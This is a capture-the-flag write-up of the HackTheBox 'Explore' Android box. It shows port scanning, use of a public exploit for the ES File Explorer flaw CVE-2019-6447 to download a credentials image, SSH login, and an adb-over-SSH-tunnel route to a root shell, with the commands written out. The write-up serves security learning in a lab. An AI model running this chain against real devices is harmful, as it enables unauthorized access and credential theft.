HackTheBox - Explore
This was classified as an easy box by bertolis on HackTheBox and my first experience with Android exploitation. Enumerating the opened ports, we discover a SSH, Android Debug Bridge (adb), and ES File Explorer, which is vulnerable to CVE-2019-6447 and will be our method to gain foothold. For privilege escalation, we will setup a SSH Tunnel to execute adb commands and gain root.
Phase 1 - Enumeration
We first run a network scan to enumerate open ports.
PORT STATE SERVICE VERSION 2222/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-SSH Server - Banana Studio | ssh-hostkey: |_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA) 5555/tcp filtered freeciv 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port2222-TCP:V=7.91%I=7%D=10/25%Time=6176573F%P=x86_64-pc-linux-gnu%r(N SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
From the results above, we see that SSH is opened on port 2222 and it’s banner states that it’s “Banana Studio.” A quick Google search reveals that Banana Studio is a SSH Server for Android operating systems.
Since we are not sure whether the output of previous nmap command shows all open ports, we will also run a full port scan on the target with the following:
sudo nmap -p- 10.10.10.247
PORT STATE SERVICE 2222/tcp open EtherNetIP-1 5555/tcp filtered freeciv 42135/tcp open unknown 45225/tcp open unknown 59777/tcp open unknown
Seeing that the four ports running were (2222, 5555, 42135, 45225, 59777) We did some research on common uses of those ports on Android operating systems. Information I found included:
- 2222: SimpleSSH
- 5555: Android Debug Bridge (ADB)
- 59777: ES File Explorer
Phase 2 - Exploitation
Doing some research on each port, we find something on port 59777 which is for ES File Explorer, we find a vulnerability that allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local network.
Looking in ExploitDB, we find a proof-of-concept Python exploit script for CVE-2019-6447
Running the Python script with the following commands shows us the listings on the directory:
python3 exploit.py listPics 10.10.10.247
Let’s download creds.jpg with the following command.
python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
And open the image.
And we got some credentials, we will try to login with the SSH Server opened on the Android device with the following command:
ssh [email protected] -p 2222
And we get in, gaining our foothold! user.txt can be found in sdcard/user.txt
Phase 3 - Privilege Escalation
Since we have access to the device through SSH, and we know that there’s an ADB service running on port 5555; means we can execute commands with ADB.
In order to run ADB commands on the device, we will have to set up SSH port forwarding with the following command:
ssh [email protected] -p 2222 -L 5555:localhost:5555
Android Debug Bridge (adb)
ADB commands help ⇐ Official documentation to adb commands.
We will run the following commands on the device, gain a shell, and escalate that shell to root.
# to establist a connection adb connect 127.0.0.1:5555 # to list connected devices adb devices # to connect to specified device with interactive shell adb -s 127.0.0.1:5555 shell
And we are root! root.txt can be found in /data/root.txt